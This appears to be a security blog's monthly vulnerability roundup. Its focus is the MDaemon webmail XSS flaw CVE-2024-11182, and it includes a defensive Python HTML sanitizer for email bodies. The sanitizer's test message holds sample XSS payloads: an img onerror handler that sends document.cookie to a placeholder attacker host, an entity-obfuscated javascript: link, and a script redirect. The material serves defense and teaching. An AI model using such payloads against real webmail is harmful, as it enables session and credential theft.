Tag Archives: MDaemon

June “In the Trend of VM” (#16): vulnerabilities in Microsoft Windows, Apache HTTP Server, the web interfaces of MDaemon and Zimbra, and the 7-Zip archiver

June “In the Trend of VM” (#16): vulnerabilities in Microsoft Windows, Apache HTTP Server, the web interfaces of MDaemon and Zimbra, and the 7-Zip archiver. A traditional monthly vulnerability roundup. 🙂

🗞 Post on Habr (rus)
🗒 Digest on the PT website (rus)

A total of 7 trending vulnerabilities:

🔻 Elevation of Privilege – Microsoft DWM Core Library (CVE-2025-30400)
🔻 Elevation of Privilege – Windows Common Log File System Driver (CVE-2025-32701, CVE-2025-32706)
🔻 Remote Code Execution & Arbitrary File Reading – Apache HTTP Server (CVE-2024-38475)
🔻 Cross Site Scripting – MDaemon Email Server (CVE-2024-11182)
🔻 Cross Site Scripting – Zimbra Collaboration (CVE-2024-27443)
🔻 Remote Code Execution – 7-Zip (BDU:2025-01793)

About Cross Site Scripting – MDaemon Email Server (CVE-2024-11182)

About Cross Site Scripting – MDaemon Email Server (CVE-2024-11182). An attacker sends an HTML-formatted email in which malicious JavaScript is carried inside an img tag. The webmail interface of MDaemon Email Server does not sanitize it, so opening the message in the webmail is enough: the script runs in the user’s browser inside the authenticated webmail session. From there the attacker can steal credentials, bypass 2FA, and read the victim’s contacts and email messages.
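The bug class described above (active content smuggled in an HTML email that the webmail renders as received) is countered on the rendering side with an allowlist sanitizer. What follows is an added example written for this post; it is not MDaemon’s code and not ESET’s PoC. The tag and attribute allowlists are assumptions, the message body is a constructed illustration of the bug class rather than the payload seen in the wild, and the host names in it are placeholders.

```python
"""Allowlist sanitizer for HTML e-mail bodies, of the kind a webmail front end
must apply before handing a message to the browser. Added example, not
MDaemon's code; allowlists and the sample message are assumptions."""
from html import escape
from html.parser import HTMLParser

# Tags the webmail view may render. Any other tag is dropped but its text kept,
# except DROP_WITH_CONTENT tags, whose body must go with them (script, CSS, frames).
ALLOWED_TAGS = {"p", "br", "b", "i", "u", "em", "strong", "a", "img", "div", "span",
                "ul", "ol", "li", "table", "tr", "td", "th", "blockquote"}
DROP_WITH_CONTENT = {"script", "style", "iframe", "object", "embed", "svg", "math", "template"}
VOID_TAGS = {"br", "img"}
# Per-tag attribute allowlist (assumed for this example). Deliberately absent:
# every on* handler, style (CSS url()/expression() vectors), srcdoc, formaction.
ALLOWED_ATTRS = {
    "a": {"href", "title"},
    "img": {"src", "alt", "title", "width", "height"},
    "td": {"colspan", "rowspan"},
    "th": {"colspan", "rowspan"},
}
URL_ATTRS = {"href", "src"}
SAFE_SCHEMES = ("http:", "https:", "mailto:", "cid:")


def url_is_safe(value):
    """Accept only known-harmless schemes (or scheme-less references).

    Whitespace and control characters are removed before the check because
    browsers ignore them inside a scheme ("jav\\tascript:" still runs); entity
    encoding ("jav&#x61;script:") has already been undone by the parser.
    """
    compact = "".join(c for c in value if c.isprintable() and not c.isspace()).lower()
    if ":" not in compact:
        return True  # relative reference, cannot name a scheme
    return compact.startswith(SAFE_SCHEMES)


class EmailHtmlSanitizer(HTMLParser):
    """Re-serialises an HTML body keeping only allowlisted tags and attributes."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.findings = []    # everything removed, usable as a detection log
        self._skip_depth = 0  # >0 while inside a DROP_WITH_CONTENT element

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self._skip_depth += 1
            self.findings.append(f"dropped <{tag}> with its content")
            return
        if self._skip_depth:
            return
        if tag not in ALLOWED_TAGS:
            self.findings.append(f"dropped tag <{tag}>")
            return
        kept = []
        for name, value in attrs:
            value = value or ""  # valueless attribute such as <img hidden>
            if name.startswith("on"):
                self.findings.append(f"dropped event handler {name} on <{tag}>")
            elif name not in ALLOWED_ATTRS.get(tag, set()):
                self.findings.append(f"dropped attribute {name} on <{tag}>")
            elif name in URL_ATTRS and not url_is_safe(value):
                self.findings.append(f"dropped unsafe URL in {name} on <{tag}>: {value.strip()!r}")
            else:
                kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            self._skip_depth = max(0, self._skip_depth - 1)
        elif not self._skip_depth and tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._skip_depth:
            self.out.append(escape(data, quote=False))

    # Comments, doctypes and processing instructions are never re-emitted: the
    # base-class handlers for them do nothing.


def sanitize_email_html(body):
    """Return (clean_html, findings); findings is empty for a harmless message."""
    s = EmailHtmlSanitizer()
    s.feed(body)
    s.close()
    return "".join(s.out), s.findings


# Constructed test message: one legitimate image plus three things that would
# run in the reader's browser if the webmail rendered the body as received.
MALICIOUS_BODY = (
    "<p>Quarterly report attached.</p>"
    "<img src=\"x\" onerror=\"fetch('https://attacker.example/?c='+document.cookie)\">"
    "<a href=\"  jav&#x61;script:alert(1)\">Open</a>"
    "<img src=\"https://img.example.com/logo.png\" alt=\"logo\">"
    "<script>document.location='https://attacker.example/'</script>"
)

if __name__ == "__main__":
    clean, findings = sanitize_email_html(MALICIOUS_BODY)
    print(clean)
    print("\n".join(findings))
```

Running it prints the body with the event handler, the javascript: link and the script element removed, followed by one finding per removal. The findings are also what a mail-flow scanner would alert on for this bug class (an on* attribute on an img, a javascript: or data: URL in href/src), but filtering at the MTA alone is not a fix: the stored message is rendered again every time it is opened, so the sanitizer must sit in the webmail’s render path. A production webmail should use a maintained HTML sanitizer library rather than a hand-rolled parser; the point of the example is which constructs must go.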

On November 1, 2024, researchers from ESET discovered that the vulnerability was being exploited in the wild. They linked the exploitation of this and several other vulnerabilities in webmail interfaces (Roundcube: CVE‑2023‑43770, CVE‑2020‑35730; Zimbra: CVE‑2024‑27443; Horde) to a broader operation dubbed “RoundPress”.

MDaemon patched the vulnerability in version 24.5.1 (released Nov 14, 2024), but ESET published the attack details and a PoC exploit only on May 15, 2025. 🤷‍♂️ The flaw was added to the CISA KEV catalog on May 19, 2025.